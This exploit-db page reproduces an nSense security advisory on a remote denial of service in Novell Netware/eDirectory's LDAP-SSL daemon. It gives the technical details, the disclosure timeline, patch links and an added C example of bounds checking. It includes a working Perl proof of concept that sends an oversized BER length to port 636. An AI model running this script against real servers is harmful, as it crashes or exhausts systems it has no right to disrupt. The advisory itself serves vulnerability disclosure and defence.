
Novell Netware eDirectory - Denial of Service

16 May 2011 00:00:00 | Reported by nSense | Type: exploitdb | Source: www.exploit-db.com

Novell Netware eDirectory - Remote DoS in LDAP-SSL daemon due to blind memory allocation, with vendor-supplied patch available

Code
      nSense Vulnerability Research Security Advisory NSENSE-2011-002
      ---------------------------------------------------------------

      Affected Vendor:    Novell
      Affected Product:   Netware, eDirectory
      Platform:           Netware / Linux
      Impact:             Remote Denial of Service
      Vendor response:    Patch
      CVE:                None
      Credit:             Knud / nSense

      Technical details
      ---------------------------------------------------------------
      It is possible to cause a Denial of Service in Novell's
      LDAP-SSL daemon due to the system blindly allocating a
      user-specified amount of memory. Exploiting the issue on a
      Netware system will cause a system-wide DoS condition. A script
      for replicating the issue is included below:

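      #!/usr/bin/perl
      # usage: ./novell.pl 10.0.0.1 0x41424344
      use IO::Socket::SSL;
      # Connect to the LDAP-SSL service (TCP 636) on the host given as $ARGV[0].
      $socket = new IO::Socket::SSL(Proto=>"tcp",
      PeerAddr=>$ARGV[0], PeerPort=>636);
      die "unable to connect to $ARGV[0]:636 ($!)\n" unless $socket;
      # BER SEQUENCE (0x30) with a 4-octet long-form length (0x84) taken from
      # $ARGV[1], followed by a minimal LDAPv3 simple BindRequest.
      print $socket "\x30\x84" . pack("N",hex($ARGV[1])) .
      "\x02\x01\x01\x60\x09\x02\x01\x03\x04\x02\x44\x4e\x80\x00" ;
      close $socket; print "done\n";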
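
The missing bound described under Technical details, shown as an added C example (not Novell's code and not part of the nSense advisory): parse the outer BER SEQUENCE header of an LDAPMessage and reject an oversized declared length before anything is allocated. The function name, the status codes and the 1 MiB cap `MAX_LDAP_MSG` are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed policy cap for one LDAPMessage; not a value from the advisory. */
#define MAX_LDAP_MSG (1u << 20)

enum ber_status { BER_OK = 0, BER_NEED_MORE = 1, BER_MALFORMED = -1, BER_TOO_LARGE = -2 };

/* Parse the outer SEQUENCE header from bytes already received. On BER_OK,
 * *hdr_len is the header size and *body_len is at most MAX_LDAP_MSG. */
static enum ber_status ber_seq_header(const uint8_t *buf, size_t have,
                                      size_t *hdr_len, size_t *body_len)
{
    if (have < 2) return BER_NEED_MORE;
    if (buf[0] != 0x30) return BER_MALFORMED;   /* LDAPMessage is a SEQUENCE */

    uint8_t first = buf[1];
    if ((first & 0x80) == 0) {                  /* short form: 7-bit length */
        *hdr_len = 2;
        *body_len = first;
        return BER_OK;
    }

    size_t n = first & 0x7f;                    /* long form: n length octets */
    if (n == 0 || n > 4) return BER_MALFORMED;  /* indefinite or >32-bit: rejected here */
    if (have < 2 + n) return BER_NEED_MORE;

    uint32_t len = 0;
    for (size_t i = 0; i < n; i++)
        len = (len << 8) | buf[2 + i];

    /* Bound the client-declared length before it can reach an allocator. */
    if (len > MAX_LDAP_MSG) return BER_TOO_LARGE;

    *hdr_len = 2 + n;
    *body_len = len;
    return BER_OK;
}

int main(void)
{
    /* Constructed header: SEQUENCE, 4 length octets declaring 0x41424344 bytes. */
    const uint8_t hdr[] = { 0x30, 0x84, 0x41, 0x42, 0x43, 0x44 };
    size_t h = 0, b = 0;
    printf("status=%d\n", (int)ber_seq_header(hdr, sizeof hdr, &h, &b));
    return 0;
}
```

A server would call a check like this before sizing any receive buffer. Growing the buffer as bytes actually arrive, rather than reserving `body_len` up front, bounds memory use further.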


      Timeline:
      20100819     Contacted vendor, supplied PoC
      20100825     Vendor acknowledges receipt of information
      20100826     Vendor creates ticket, SR # 10645215982
      20100922     nSense requests status update
      20100928     Vendor responds that a fix is being tested
      20101109     nSense requests status update
      20101112     nSense requests status update
      20101112     Vendor responds, fix is still being tested
      20101221     nSense requests status update
      20101227     Vendor responds, patch is being built
      20110124     nSense requests status update
      20110127     Vendor responds, patches planned for mid-February 2011
      20110320     nSense requests status update
      20110329     nSense requests status update
      20110329     Vendor responds, other issues discovered in code
      20110409     Vendor responds, patch issued for eDirectory
      20110409     nSense asks for netware patch date
      20110419     nSense asks for netware patch date
      20110427     nSense asks for netware patch date
      20110504     Vendor responds, netware patch released

      Solution
      Install the vendor supplied patch.
      Netware:    http://download.novell.com/Download?buildid=bXPFv5btgsA~
      eDirectory: http://download.novell.com/Download?buildid=-KMoN4RVaCQ~

      Links:
      http://www.nsense.fi                       http://www.nsense.dk


